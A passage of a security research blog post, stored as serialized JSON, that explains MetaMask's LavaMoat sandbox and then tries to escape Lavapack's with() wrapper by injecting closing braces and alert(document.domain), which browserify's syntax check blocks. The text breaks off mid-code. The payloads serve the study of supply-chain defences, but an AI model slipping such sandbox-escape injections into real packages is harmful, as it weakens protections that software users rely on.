\"@metamask/providers>@metamask/safe-event-emitter\"",{"type":26,"tag":137,"props":50088,"children":50089},{"style":5584},[50090],{"type":32,"value":7072},{"type":26,"tag":137,"props":50092,"children":50093},{"style":5573},[50094],{"type":32,"value":49151},{"type":26,"tag":35,"props":50096,"children":50097},{},[50098,50099,50104,50106,50111,50113,50119],{"type":32,"value":19206},{"type":26,"tag":130,"props":50100,"children":50102},{"className":50101},[],[50103],{"type":32,"value":39868},{"type":32,"value":50105}," section in a LavaMoat policy specifies which global variables and properties a module can access, setting permissions for its global scope interactions. Similarly, the ",{"type":26,"tag":130,"props":50107,"children":50109},{"className":50108},[],[50110],{"type":32,"value":39876},{"type":32,"value":50112}," section outlines the module's dependencies and the permissions or trust relationships with those dependencies. This defines how ",{"type":26,"tag":130,"props":50114,"children":50116},{"className":50115},[],[50117],{"type":32,"value":50118},"@metamask/providers",{"type":32,"value":50120}," interacts with other packages.",{"type":26,"tag":35,"props":50122,"children":50123},{},[50124,50126,50132],{"type":32,"value":50125},"To enforce these policies, LavaMoat uses ",{"type":26,"tag":130,"props":50127,"children":50129},{"className":50128},[],[50130],{"type":32,"value":50131},"lavapack",{"type":32,"value":50133},", a custom webpack that wraps ever dependency and applies the specified rules independently.",{"type":26,"tag":21485,"props":50135,"children":50137},{"id":50136},"npm-anti-hijacking",[50138],{"type":32,"value":49754},{"type":26,"tag":35,"props":50140,"children":50141},{},[50142],{"type":32,"value":50143},"One important note is that Lavamoat can't rely solely on the names of the packages as they are published on NPM. Otherwise, a malicious actor could create a package with the same name as a popular, trusted package.",{"type":26,"tag":35,"props":50145,"children":50146},{},[50147,50149,50156],{"type":32,"value":50148},"Instead, Lavamoat looks at how each package is connected by ",{"type":26,"tag":41,"props":50150,"children":50153},{"href":50151,"rel":50152},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/walk.js#L22",[45],[50154],{"type":32,"value":50155},"walking the modules",{"type":32,"value":50157}," in a project's dependency tree, thus generating a unique name for each package.",{"type":26,"tag":21485,"props":50159,"children":50161},{"id":50160},"scuttling",[50162],{"type":32,"value":49759},{"type":26,"tag":35,"props":50164,"children":50165},{},[50166,50168,50174],{"type":32,"value":50167},"Scuttling is an optional feature that adds an extra layer of protection. Even if the real ",{"type":26,"tag":130,"props":50169,"children":50171},{"className":50170},[],[50172],{"type":32,"value":50173},"GlobalThis",{"type":32,"value":50175}," object is leaked by an attacker or accessed through a malicious package manager, scuttling removes sensitive APIs, preventing malicious requests from being executed.",{"type":26,"tag":35,"props":50177,"children":50178},{},[50179,50181,50187],{"type":32,"value":50180},"For example, ",{"type":26,"tag":41,"props":50182,"children":50185},{"href":50183,"rel":50184},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L57",[45],[50186],{"type":32,"value":3580},{"type":32,"value":50188}," we see how Lavamoat checks if the feature is enabled after the root package compartment is created:",{"type":26,"tag":5512,"props":50190,"children":50192},{"className":33958,"code":50191,"language":33960,"meta":7,"style":7},"    if (scuttleOpts.enabled) {\n      if (!Array.isArray(scuttleOpts.exceptions)) {\n        throw new Error(`LavaMoat - scuttleGlobalThis.exceptions must be an array, got \"${typeof scuttleOpts.exceptions}\"`)\n      }\n      scuttleOpts.scuttlerFunc(globalRef, realm => performScuttleGlobalThis(realm, scuttleOpts.exceptions))\n    }\n",[50193],{"type":26,"tag":130,"props":50194,"children":50195},{"__ignoreMap":7},[50196,50225,50275,50334,50341,50413],{"type":26,"tag":137,"props":50197,"children":50198},{"class":5559,"line":5560},[50199,50203,50207,50212,50216,50221],{"type":26,"tag":137,"props":50200,"children":50201},{"style":5610},[50202],{"type":32,"value":14870},{"type":26,"tag":137,"props":50204,"children":50205},{"style":5601},[50206],{"type":32,"value":4625},{"type":26,"tag":137,"props":50208,"children":50209},{"style":5584},[50210],{"type":32,"value":50211},"scuttleOpts",{"type":26,"tag":137,"props":50213,"children":50214},{"style":5601},[50215],{"type":32,"value":470},{"type":26,"tag":137,"props":50217,"children":50218},{"style":5584},[50219],{"type":32,"value":50220},"enabled",{"type":26,"tag":137,"props":50222,"children":50223},{"style":5601},[50224],{"type":32,"value":17395},{"type":26,"tag":137,"props":50226,"children":50227},{"class":5559,"line":5412},[50228,50232,50236,50240,50245,50249,50254,50258,50262,50266,50271],{"type":26,"tag":137,"props":50229,"children":50230},{"style":5610},[50231],{"type":32,"value":41883},{"type":26,"tag":137,"props":50233,"children":50234},{"style":5601},[50235],{"type":32,"value":4625},{"type":26,"tag":137,"props":50237,"children":50238},{"style":5590},[50239],{"type":32,"value":23215},{"type":26,"tag":137,"props":50241,"children":50242},{"style":5584},[50243],{"type":32,"value":50244},"Array",{"type":26,"tag":137,"props":50246,"children":50247},{"style":5601},[50248],{"type":32,"value":470},{"type":26,"tag":137,"props":50250,"children":50251},{"style":5682},[50252],{"type":32,"value":50253},"isArray",{"type":26,"tag":137,"props":50255,"children":50256},{"style":5601},[50257],{"type":32,"value":165},{"type":26,"tag":137,"props":50259,"children":50260},{"style":5584},[50261],{"type":32,"value":50211},{"type":26,"tag":137,"props":50263,"children":50264},{"style":5601},[50265],{"type":32,"value":470},{"type":26,"tag":137,"props":50267,"children":50268},{"style":5584},[50269],{"type":32,"value":50270},"exceptions",{"type":26,"tag":137,"props":50272,"children":50273},{"style":5601},[50274],{"type":32,"value":37790},{"type":26,"tag":137,"props":50276,"children":50277},{"class":5559,"line":5417},[50278,50283,50287,50291,50295,50300,50304,50308,50313,50317,50321,50325,50330],{"type":26,"tag":137,"props":50279,"children":50280},{"style":5610},[50281],{"type":32,"value":50282},"        throw",{"type":26,"tag":137,"props":50284,"children":50285},{"style":5573},[50286],{"type":32,"value":34528},{"type":26,"tag":137,"props":50288,"children":50289},{"style":5682},[50290],{"type":32,"value":42880},{"type":26,"tag":137,"props":50292,"children":50293},{"style":5601},[50294],{"type":32,"value":165},{"type":26,"tag":137,"props":50296,"children":50297},{"style":6837},[50298],{"type":32,"value":50299},"`LavaMoat - scuttleGlobalThis.exceptions must be an array, got \"",{"type":26,"tag":137,"props":50301,"children":50302},{"style":5573},[50303],{"type":32,"value":36704},{"type":26,"tag":137,"props":50305,"children":50306},{"style":5573},[50307],{"type":32,"value":33998},{"type":26,"tag":137,"props":50309,"children":50310},{"style":5584},[50311],{"type":32,"value":50312}," scuttleOpts",{"type":26,"tag":137,"props":50314,"children":50315},{"style":5590},[50316],{"type":32,"value":470},{"type":26,"tag":137,"props":50318,"children":50319},{"style":5584},[50320],{"type":32,"value":50270},{"type":26,"tag":137,"props":50322,"children":50323},{"style":5573},[50324],{"type":32,"value":36736},{"type":26,"tag":137,"props":50326,"children":50327},{"style":6837},[50328],{"type":32,"value":50329},"\"`",{"type":26,"tag":137,"props":50331,"children":50332},{"style":5601},[50333],{"type":32,"value":5742},{"type":26,"tag":137,"props":50335,"children":50336},{"class":5559,"line":5642},[50337],{"type":26,"tag":137,"props":50338,"children":50339},{"style":5601},[50340],{"type":32,"value":15255},{"type":26,"tag":137,"props":50342,"children":50343},{"class":5559,"line":5745},[50344,50349,50353,50358,50362,50367,50371,50376,50380,50385,50389,50393,50397,50401,50405,50409],{"type":26,"tag":137,"props":50345,"children":50346},{"style":5584},[50347],{"type":32,"value":50348},"      scuttleOpts",{"type":26,"tag":137,"props":50350,"children":50351},{"style":5601},[50352],{"type":32,"value":470},{"type":26,"tag":137,"props":50354,"children":50355},{"style":5682},[50356],{"type":32,"value":50357},"scuttlerFunc",{"type":26,"tag":137,"props":50359,"children":50360},{"style":5601},[50361],{"type":32,"value":165},{"type":26,"tag":137,"props":50363,"children":50364},{"style":5584},[50365],{"type":32,"value":50366},"globalRef",{"type":26,"tag":137,"props":50368,"children":50369},{"style":5601},[50370],{"type":32,"value":1108},{"type":26,"tag":137,"props":50372,"children":50373},{"style":5584},[50374],{"type":32,"value":50375},"realm",{"type":26,"tag":137,"props":50377,"children":50378},{"style":5573},[50379],{"type":32,"value":30345},{"type":26,"tag":137,"props":50381,"children":50382},{"style":5682},[50383],{"type":32,"value":50384}," performScuttleGlobalThis",{"type":26,"tag":137,"props":50386,"children":50387},{"style":5601},[50388],{"type":32,"value":165},{"type":26,"tag":137,"props":50390,"children":50391},{"style":5584},[50392],{"type":32,"value":50375},{"type":26,"tag":137,"props":50394,"children":50395},{"style":5601},[50396],{"type":32,"value":1108},{"type":26,"tag":137,"props":50398,"children":50399},{"style":5584},[50400],{"type":32,"value":50211},{"type":26,"tag":137,"props":50402,"children":50403},{"style":5601},[50404],{"type":32,"value":470},{"type":26,"tag":137,"props":50406,"children":50407},{"style":5584},[50408],{"type":32,"value":50270},{"type":26,"tag":137,"props":50410,"children":50411},{"style":5601},[50412],{"type":32,"value":22305},{"type":26,"tag":137,"props":50414,"children":50415},{"class":5559,"line":5850},[50416],{"type":26,"tag":137,"props":50417,"children":50418},{"style":5601},[50419],{"type":32,"value":5945},{"type":26,"tag":35,"props":50421,"children":50422},{},[50423,50425,50431,50433,50439],{"type":32,"value":50424},"Subsequently, the code defines a ",{"type":26,"tag":41,"props":50426,"children":50429},{"href":50427,"rel":50428},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L74",[45],[50430],{"type":32,"value":33972},{"type":32,"value":50432}," called ",{"type":26,"tag":130,"props":50434,"children":50436},{"className":50435},[],[50437],{"type":32,"value":50438},"generateScuttleOpts",{"type":32,"value":50440}," that creates and returns an options object.",{"type":26,"tag":35,"props":50442,"children":50443},{},[50444,50446,50452,50453,50459,50461,50466,50468,50474],{"type":32,"value":50445},"Finally, the ",{"type":26,"tag":130,"props":50447,"children":50449},{"className":50448},[],[50450],{"type":32,"value":50451},"performScuttleGlobalThis",{"type":32,"value":1011},{"type":26,"tag":41,"props":50454,"children":50457},{"href":50455,"rel":50456},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L125",[45],[50458],{"type":32,"value":33972},{"type":32,"value":50460}," modifies the properties of the global object (",{"type":26,"tag":130,"props":50462,"children":50464},{"className":50463},[],[50465],{"type":32,"value":50366},{"type":32,"value":50467},"). It starts by creating an array ",{"type":26,"tag":130,"props":50469,"children":50471},{"className":50470},[],[50472],{"type":32,"value":50473},"props",{"type":32,"value":50475},", containing the names of all properties in the prototype chain of globalRef. Then, an empty object is then created to serve as a proxy for scuttled properties. The function then iterates over each property, making changes to the global window object based on the provided configuration.",{"type":26,"tag":92,"props":50477,"children":50479},{"id":50478},"hacking-webpacks",[50480],{"type":32,"value":50481},"Hacking Webpacks",{"type":26,"tag":35,"props":50483,"children":50484},{},[50485],{"type":32,"value":50486},"Now let's get to the fun stuff.",{"type":26,"tag":35,"props":50488,"children":50489},{},[50490],{"type":32,"value":50491},"Webpack is used to bundle all modules and packages into a single file. It inserts all the code of these modules into the bundle file. Checking Lavapack source code, we can see how this actually happens.",{"type":26,"tag":5512,"props":50493,"children":50495},{"className":33958,"code":50494,"language":33960,"meta":7,"style":7},"  const filename = encodeURI(String(moduleData.file))\n  let moduleWrapperSource\n  if (bundleWithPrecompiledModules) {\n    moduleWrapperSource = `function(){\n      with (this.scopeTerminator) {\n        with (this.globalThis) {\n          return function() {\n            'use strict';\n            // source: ${filename}\n            return function (require, module, exports) {\n              __MODULE_CONTENT__\n            };\n          };\n        }\n      }\n    }`\n",[50496],{"type":26,"tag":130,"props":50497,"children":50498},{"__ignoreMap":7},[50499,50551,50563,50583,50600,50608,50616,50624,50632,50653,50661,50669,50677,50684,50691,50698],{"type":26,"tag":137,"props":50500,"children":50501},{"class":5559,"line":5560},[50502,50506,50511,50515,50520,50524,50529,50533,50538,50542,50547],{"type":26,"tag":137,"props":50503,"children":50504},{"style":5573},[50505],{"type":32,"value":38784},{"type":26,"tag":137,"props":50507,"children":50508},{"style":5584},[50509],{"type":32,"value":50510}," filename",{"type":26,"tag":137,"props":50512,"children":50513},{"style":5590},[50514],{"type":32,"value":5593},{"type":26,"tag":137,"props":50516,"children":50517},{"style":5682},[50518],{"type":32,"value":50519}," encodeURI",{"type":26,"tag":137,"props":50521,"children":50522},{"style":5601},[50523],{"type":32,"value":165},{"type":26,"tag":137,"props":50525,"children":50526},{"style":5682},[50527],{"type":32,"value":50528},"String",{"type":26,"tag":137,"props":50530,"children":50531},{"style":5601},[50532],{"type":32,"value":165},{"type":26,"tag":137,"props":50534,"children":50535},{"style":5584},[50536],{"type":32,"value":50537},"moduleData",{"type":26,"tag":137,"props":50539,"children":50540},{"style":5601},[50541],{"type":32,"value":470},{"type":26,"tag":137,"props":50543,"children":50544},{"style":5584},[50545],{"type":32,"value":50546},"file",{"type":26,"tag":137,"props":50548,"children":50549},{"style":5601},[50550],{"type":32,"value":22305},{"type":26,"tag":137,"props":50552,"children":50553},{"class":5559,"line":5412},[50554,50558],{"type":26,"tag":137,"props":50555,"children":50556},{"style":5573},[50557],{"type":32,"value":10440},{"type":26,"tag":137,"props":50559,"children":50560},{"style":5584},[50561],{"type":32,"value":50562}," moduleWrapperSource\n",{"type":26,"tag":137,"props":50564,"children":50565},{"class":5559,"line":5417},[50566,50570,50574,50579],{"type":26,"tag":137,"props":50567,"children":50568},{"style":5610},[50569],{"type":32,"value":33989},{"type":26,"tag":137,"props":50571,"children":50572},{"style":5601},[50573],{"type":32,"value":4625},{"type":26,"tag":137,"props":50575,"children":50576},{"style":5584},[50577],{"type":32,"value":50578},"bundleWithPrecompiledModules",{"type":26,"tag":137,"props":50580,"children":50581},{"style":5601},[50582],{"type":32,"value":17395},{"type":26,"tag":137,"props":50584,"children":50585},{"class":5559,"line":5642},[50586,50591,50595],{"type":26,"tag":137,"props":50587,"children":50588},{"style":5584},[50589],{"type":32,"value":50590},"    moduleWrapperSource",{"type":26,"tag":137,"props":50592,"children":50593},{"style":5590},[50594],{"type":32,"value":5593},{"type":26,"tag":137,"props":50596,"children":50597},{"style":6837},[50598],{"type":32,"value":50599}," `function(){\n",{"type":26,"tag":137,"props":50601,"children":50602},{"class":5559,"line":5745},[50603],{"type":26,"tag":137,"props":50604,"children":50605},{"style":6837},[50606],{"type":32,"value":50607},"      with (this.scopeTerminator) {\n",{"type":26,"tag":137,"props":50609,"children":50610},{"class":5559,"line":5850},[50611],{"type":26,"tag":137,"props":50612,"children":50613},{"style":6837},[50614],{"type":32,"value":50615},"        with (this.globalThis) {\n",{"type":26,"tag":137,"props":50617,"children":50618},{"class":5559,"line":5878},[50619],{"type":26,"tag":137,"props":50620,"children":50621},{"style":6837},[50622],{"type":32,"value":50623},"          return function() {\n",{"type":26,"tag":137,"props":50625,"children":50626},{"class":5559,"line":5891},[50627],{"type":26,"tag":137,"props":50628,"children":50629},{"style":6837},[50630],{"type":32,"value":50631},"            'use strict';\n",{"type":26,"tag":137,"props":50633,"children":50634},{"class":5559,"line":5909},[50635,50640,50644,50649],{"type":26,"tag":137,"props":50636,"children":50637},{"style":6837},[50638],{"type":32,"value":50639},"            // source: ",{"type":26,"tag":137,"props":50641,"children":50642},{"style":5573},[50643],{"type":32,"value":36704},{"type":26,"tag":137,"props":50645,"children":50646},{"style":5584},[50647],{"type":32,"value":50648},"filename",{"type":26,"tag":137,"props":50650,"children":50651},{"style":5573},[50652],{"type":32,"value":6507},{"type":26,"tag":137,"props":50654,"children":50655},{"class":5559,"line":5930},[50656],{"type":26,"tag":137,"props":50657,"children":50658},{"style":6837},[50659],{"type":32,"value":50660},"            return function (require, module, exports) {\n",{"type":26,"tag":137,"props":50662,"children":50663},{"class":5559,"line":5939},[50664],{"type":26,"tag":137,"props":50665,"children":50666},{"style":6837},[50667],{"type":32,"value":50668},"              __MODULE_CONTENT__\n",{"type":26,"tag":137,"props":50670,"children":50671},{"class":5559,"line":6191},[50672],{"type":26,"tag":137,"props":50673,"children":50674},{"style":6837},[50675],{"type":32,"value":50676},"            };\n",{"type":26,"tag":137,"props":50678,"children":50679},{"class":5559,"line":6208},[50680],{"type":26,"tag":137,"props":50681,"children":50682},{"style":6837},[50683],{"type":32,"value":11288},{"type":26,"tag":137,"props":50685,"children":50686},{"class":5559,"line":6225},[50687],{"type":26,"tag":137,"props":50688,"children":50689},{"style":6837},[50690],{"type":32,"value":5936},{"type":26,"tag":137,"props":50692,"children":50693},{"class":5559,"line":6238},[50694],{"type":26,"tag":137,"props":50695,"children":50696},{"style":6837},[50697],{"type":32,"value":15255},{"type":26,"tag":137,"props":50699,"children":50700},{"class":5559,"line":6247},[50701],{"type":26,"tag":137,"props":50702,"children":50703},{"style":6837},[50704],{"type":32,"value":50705},"    }`\n",{"type":26,"tag":35,"props":50707,"children":50708},{},[50709,50711,50717,50719,50725],{"type":32,"value":50710},"Lavapack uses ",{"type":26,"tag":130,"props":50712,"children":50714},{"className":50713},[],[50715],{"type":32,"value":50716},"with()",{"type":32,"value":50718}," proxies to restrict the objects accessible by the module, and ",{"type":26,"tag":130,"props":50720,"children":50722},{"className":50721},[],[50723],{"type":32,"value":50724},"__MODULE_CONTENT__",{"type":32,"value":50726}," is replaced by the content of a file required by the project being built.",{"type":26,"tag":118,"props":50728,"children":50730},{"id":50729},"injection-not-so-simple",[50731],{"type":32,"value":50732},"Injection? Not So Simple",{"type":26,"tag":35,"props":50734,"children":50735},{},[50736,50738,50743],{"type":32,"value":50737},"We first tried to inject invalid javascript inside a javascript file, and then attempt to escape the ",{"type":26,"tag":130,"props":50739,"children":50741},{"className":50740},[],[50742],{"type":32,"value":15242},{"type":32,"value":50744}," environment:",{"type":26,"tag":5512,"props":50746,"children":50748},{"className":33958,"code":50747,"language":33960,"meta":7,"style":7},"   } // end function 1\n  } // end function 2\n } // end with 1\n} // end with 2\n\nalert(document.domain)\n",[50749],{"type":26,"tag":130,"props":50750,"children":50751},{"__ignoreMap":7},[50752,50765,50777,50789,50801,50808],{"type":26,"tag":137,"props":50753,"children":50754},{"class":5559,"line":5560},[50755,50760],{"type":26,"tag":137,"props":50756,"children":50757},{"style":5601},[50758],{"type":32,"value":50759},"   } ",{"type":26,"tag":137,"props":50761,"children":50762},{"style":5564},[50763],{"type":32,"value":50764},"// end function 1\n",{"type":26,"tag":137,"props":50766,"children":50767},{"class":5559,"line":5412},[50768,50772],{"type":26,"tag":137,"props":50769,"children":50770},{"style":5601},[50771],{"type":32,"value":34063},{"type":26,"tag":137,"props":50773,"children":50774},{"style":5564},[50775],{"type":32,"value":50776},"// end function 2\n",{"type":26,"tag":137,"props":50778,"children":50779},{"class":5559,"line":5417},[50780,50784],{"type":26,"tag":137,"props":50781,"children":50782},{"style":5601},[50783],{"type":32,"value":38798},{"type":26,"tag":137,"props":50785,"children":50786},{"style":5564},[50787],{"type":32,"value":50788},"// end with 1\n",{"type":26,"tag":137,"props":50790,"children":50791},{"class":5559,"line":5642},[50792,50796],{"type":26,"tag":137,"props":50793,"children":50794},{"style":5601},[50795],{"type":32,"value":49476},{"type":26,"tag":137,"props":50797,"children":50798},{"style":5564},[50799],{"type":32,"value":50800},"// end with 2\n",{"type":26,"tag":137,"props":50802,"children":50803},{"class":5559,"line":5745},[50804],{"type":26,"tag":137,"props":50805,"children":50806},{"emptyLinePlaceholder":18},[50807],{"type":32,"value":6276},{"type":26,"tag":137,"props":50809,"children":50810},{"class":5559,"line":5850},[50811,50815,50819,50823,50827,50831],{"type":26,"tag":137,"props":50812,"children":50813},{"style":5682},[50814],{"type":32,"value":35293},{"type":26,"tag":137,"props":50816,"children":50817},{"style":5601},[50818],{"type":32,"value":165},{"type":26,"tag":137,"props":50820,"children":50821},{"style":5584},[50822],{"type":32,"value":35303},{"type":26,"tag":137,"props":50824,"children":50825},{"style":5601},[50826],{"type":32,"value":470},{"type":26,"tag":137,"props":50828,"children":50829},{"style":5584},[50830],{"type":32,"value":35313},{"type":26,"tag":137,"props":50832,"children":50833},{"style":5601},[50834],{"type":32,"value":5742},{"type":26,"tag":35,"props":50836,"children":50837},{},[50838,50840,50846,50848,50855],{"type":32,"value":50839},"However, when we tried to bundle it, a ",{"type":26,"tag":130,"props":50841,"children":50843},{"className":50842},[],[50844],{"type":32,"value":50845},"ParseError",{"type":32,"value":50847}," was thrown. This is because Lavapack is a plugin of ",{"type":26,"tag":41,"props":50849,"children":50852},{"href":50850,"rel":50851},"https://github.com/browserify/browserify",[45],[50853],{"type":32,"value":50854},"browserify",{"type":32,"value":50856},", which has a syntax check before replacing the code.",{"type":26,"tag":35,"props":50858,"children":50859},{},[50860,50862,50868,50870,50876,50878,50884,50886,50891],{"type":32,"value":50861},"Looking deeper into browserify, we find it has a ",{"type":26,"tag":130,"props":50863,"children":50865},{"className":50864},[],[50866],{"type":32,"value":50867},"syntax",{"type":32,"value":50869}," stage on it's pipeline, and uses the ",{"type":26,"tag":130,"props":50871,"children":50873},{"className":50872},[],[50874],{"type":32,"value":50875},"syntax-error",{"type":32,"value":50877}," npm package to validate the syntax of each javascript file content. Since Lavapack replaces the ",{"type":26,"tag":130,"props":50879,"children":50881},{"className":50880},[],[50882],{"type":32,"value":50883},"pack",{"type":32,"value":50885}," stage on browserify pipeline, which comes after the ",{"type":26,"tag":130,"props":50887,"children":50889},{"className":50888},[],[50890],{"type":32,"value":50867},{"type":32,"value":50892},", it was not possible to inject invalid javascript to escape the Lavamoat sandbox.",{"type":26,"tag":35,"props":50894,"children":50895},{},[50896],{"type":26,"tag":2210,"props":50897,"children":50900},{"alt":50898,"src":50899},"Pipeline","/posts/supply-chain-attacks-a-new-era/pipeline.png",[],{"type":26,"tag":35,"props":50902,"children":50903},{},[50904,50905,50910,50912,50917],{"type":32,"value":19206},{"type":26,"tag":130,"props":50906,"children":50908},{"className":50907},[],[50909],{"type":32,"value":50875},{"type":32,"value":50911}," package performs a syntax check by using  ",{"type":26,"tag":130,"props":50913,"children":50915},{"className":50914},[],[50916],{"type":32,"value":40144},{"type":32,"value":50918}," with function hoisting:",{"type":26,"tag":5512,"props":50920,"children":50922},{"className":33958,"code":50921,"language":33960,"meta":7,"style":7},"try {\n    eval('throw \"STOP\"; (function () { ' + src + '\\n})()');\n    return;\n}\ncatch (err) {\n    if (err === 'STOP') return undefined;\n    if (err.constructor.name !== 'SyntaxError') return err;\n    return errorInfo(src, file, opts);\n}\n",[50923],{"type":26,"tag":130,"props":50924,"children":50925},{"__ignoreMap":7},[50926,50938,50988,50999,51006,51027,51068,51128,51169],{"type":26,"tag":137,"props":50927,"children":50928},{"class":5559,"line":5560},[50929,50934],{"type":26,"tag":137,"props":50930,"children":50931},{"style":5610},[50932],{"type":32,"value":50933},"try",{"type":26,"tag":137,"props":50935,"children":50936},{"style":5601},[50937],{"type":32,"value":5875},{"type":26,"tag":137,"props":50939,"children":50940},{"class":5559,"line":5412},[50941,50946,50950,50955,50959,50964,50968,50973,50979,50984],{"type":26,"tag":137,"props":50942,"children":50943},{"style":5682},[50944],{"type":32,"value":50945},"    eval",{"type":26,"tag":137,"props":50947,"children":50948},{"style":5601},[50949],{"type":32,"value":165},{"type":26,"tag":137,"props":50951,"children":50952},{"style":6837},[50953],{"type":32,"value":50954},"'throw \"STOP\"; (function () { '",{"type":26,"tag":137,"props":50956,"children":50957},{"style":5590},[50958],{"type":32,"value":11491},{"type":26,"tag":137,"props":50960,"children":50961},{"style":5584},[50962],{"type":32,"value":50963}," src",{"type":26,"tag":137,"props":50965,"children":50966},{"style":5590},[50967],{"type":32,"value":11491},{"type":26,"tag":137,"props":50969,"children":50970},{"style":6837},[50971],{"type":32,"value":50972}," '",{"type":26,"tag":137,"props":50974,"children":50976},{"style":50975},"--shiki-default:#D7BA7D",[50977],{"type":32,"value":50978},"\\n",{"type":26,"tag":137,"props":50980,"children":50981},{"style":6837},[50982],{"type":32,"value":50983},"})()'",{"type":26,"tag":137,"props":50985,"children":50986},{"style":5601},[50987],{"type":32,"value":6430},{"type":26,"tag":137,"props":50989,"children":50990},{"class":5559,"line":5417},[50991,50995],{"type":26,"tag":137,"props":50992,"children":50993},{"style":5610},[50994],{"type":32,"value":19582},{"type":26,"tag":137,"props":50996,"children":50997},{"style":5601},[50998],{"type":32,"value":5604},{"type":26,"tag":137,"props":51000,"children":51001},{"class":5559,"line":5642},[51002],{"type":26,"tag":137,"props":51003,"children":51004},{"style":5601},[51005],{"type":32,"value":6507},{"type":26,"tag":137,"props":51007,"children":51008},{"class":5559,"line":5745},[51009,51014,51018,51023],{"type":26,"tag":137,"props":51010,"children":51011},{"style":5610},[51012],{"type":32,"value":51013},"catch",{"type":26,"tag":137,"props":51015,"children":51016},{"style":5601},[51017],{"type":32,"value":4625},{"type":26,"tag":137,"props":51019,"children":51020},{"style":5584},[51021],{"type":32,"value":51022},"err",{"type":26,"tag":137,"props":51024,"children":51025},{"style":5601},[51026],{"type":32,"value":17395},{"type":26,"tag":137,"props":51028,"children":51029},{"class":5559,"line":5850},[51030,51034,51038,51042,51046,51051,51055,51060,51064],{"type":26,"tag":137,"props":51031,"children":51032},{"style":5610},[51033],{"type":32,"value":14870},{"type":26,"tag":137,"props":51035,"children":51036},{"style":5601},[51037],{"type":32,"value":4625},{"type":26,"tag":137,"props":51039,"children":51040},{"style":5584},[51041],{"type":32,"value":51022},{"type":26,"tag":137,"props":51043,"children":51044},{"style":5590},[51045],{"type":32,"value":34017},{"type":26,"tag":137,"props":51047,"children":51048},{"style":6837},[51049],{"type":32,"value":51050}," 'STOP'",{"type":26,"tag":137,"props":51052,"children":51053},{"style":5601},[51054],{"type":32,"value":5671},{"type":26,"tag":137,"props":51056,"children":51057},{"style":5610},[51058],{"type":32,"value":51059},"return",{"type":26,"tag":137,"props":51061,"children":51062},{"style":5573},[51063],{"type":32,"value":41934},{"type":26,"tag":137,"props":51065,"children":51066},{"style":5601},[51067],{"type":32,"value":5604},{"type":26,"tag":137,"props":51069,"children":51070},{"class":5559,"line":5878},[51071,51075,51079,51083,51087,51092,51096,51101,51106,51111,51115,51119,51124],{"type":26,"tag":137,"props":51072,"children":51073},{"style":5610},[51074],{"type":32,"value":14870},{"type":26,"tag":137,"props":51076,"children":51077},{"style":5601},[51078],{"type":32,"value":4625},{"type":26,"tag":137,"props":51080,"children":51081},{"style":5584},[51082],{"type":32,"value":51022},{"type":26,"tag":137,"props":51084,"children":51085},{"style":5601},[51086],{"type":32,"value":470},{"type":26,"tag":137,"props":51088,"children":51089},{"style":5584},[51090],{"type":32,"value":51091},"constructor",{"type":26,"tag":137,"props":51093,"children":51094},{"style":5601},[51095],{"type":32,"value":470},{"type":26,"tag":137,"props":51097,"children":51098},{"style":5584},[51099],{"type":32,"value":51100},"name",{"type":26,"tag":137,"props":51102,"children":51103},{"style":5590},[51104],{"type":32,"value":51105}," !==",{"type":26,"tag":137,"props":51107,"children":51108},{"style":6837},[51109],{"type":32,"value":51110}," 'SyntaxError'",{"type":26,"tag":137,"props":51112,"children":51113},{"style":5601},[51114],{"type":32,"value":5671},{"type":26,"tag":137,"props":51116,"children":51117},{"style":5610},[51118],{"type":32,"value":51059},{"type":26,"tag":137,"props":51120,"children":51121},{"style":5584},[51122],{"type":32,"value":51123}," err",{"type":26,"tag":137,"props":51125,"children":51126},{"style":5601},[51127],{"type":32,"value":5604},{"type":26,"tag":137,"props":51129,"children":51130},{"class":5559,"line":5891},[51131,51135,51140,51144,51148,51152,51156,51160,51165],{"type":26,"tag":137,"props":51132,"children":51133},{"style":5610},[51134],{"type":32,"value":19582},{"type":26,"tag":137,"props":51136,"children":51137},{"style":5682},[51138],{"type":32,"value":51139}," errorInfo",{"type":26,"tag":137,"props":51141,"children":51142},{"style":5601},[51143],{"type":32,"value":165},{"type":26,"tag":137,"props":51145,"children":51146},{"style":5584},[51147],{"type":32,"value":35265},{"type":26,"tag":137,"props":51149,"children":51150},{"style":5601},[51151],{"type":32,"value":1108},{"type":26,"tag":137,"props":51153,"children":51154},{"style":5584},[51155],{"type":32,"value":50546},{"type":26,"tag":137,"props":51157,"children":51158},{"style":5601},[51159],{"type":32,"value":1108},{"type":26,"tag":137,"props":51161,"children":51162},{"style":5584},[51163],{"type":32,"value":51164},"opts",{"type":26,"tag":137,"props":51166,"children":51167},{"style":5601},[51168],{"type":32,"value":6430},{"type":26,"tag":137,"props":51170,"children":51171},{"class":5559,"line":5909},[51172],{"type":26,"tag":137,"props":51173,"children":51174},{"style":5601},[51175],{"type":32,"value":6507},{"type":26,"tag":35,"props":51177,"children":51178},{},[51179,51181,51185,51187,51193,51195,51200],{"type":32,"value":51180},"Interestingly, it ",{"type":26,"tag":762,"props":51182,"children":51183},{},[51184],{"type":32,"value":6582},{"type":32,"value":51186}," possible to inject a ",{"type":26,"tag":130,"props":51188,"children":51190},{"className":51189},[],[51191],{"type":32,"value":51192},"}); (() => {",{"type":32,"value":51194}," inside source, and will not throw a syntax error. Unfortunately, this is not enough to bypass the ",{"type":26,"tag":130,"props":51196,"children":51198},{"className":51197},[],[51199],{"type":32,"value":50716},{"type":32,"value":51201}," sandbox of Lavapack.",{"type":26,"tag":118,"props":51203,"children":51205},{"id":51204},"sourcemap-the-syntax-killer",[51206],{"type":32,"value":51207},"SourceMap: The Syntax Killer",{"type":26,"tag":35,"props":51209,"children":51210},{},[51211,51213,51220],{"type":32,"value":51212},"Lavapack has a feature to extract source maps files from the code using ",{"type":26,"tag":41,"props":51214,"children":51217},{"href":51215,"rel":51216},"https://www.npmjs.com/package/convert-source-map",[45],[51218],{"type":32,"value":51219},"convert-source-map",{"type":32,"value":51221}," npm package:",{"type":26,"tag":5512,"props":51223,"children":51225},{"className":33958,"code":51224,"language":33960,"meta":7,"style":7},"function extractSourceMaps(sourceCode) {\n  const converter = 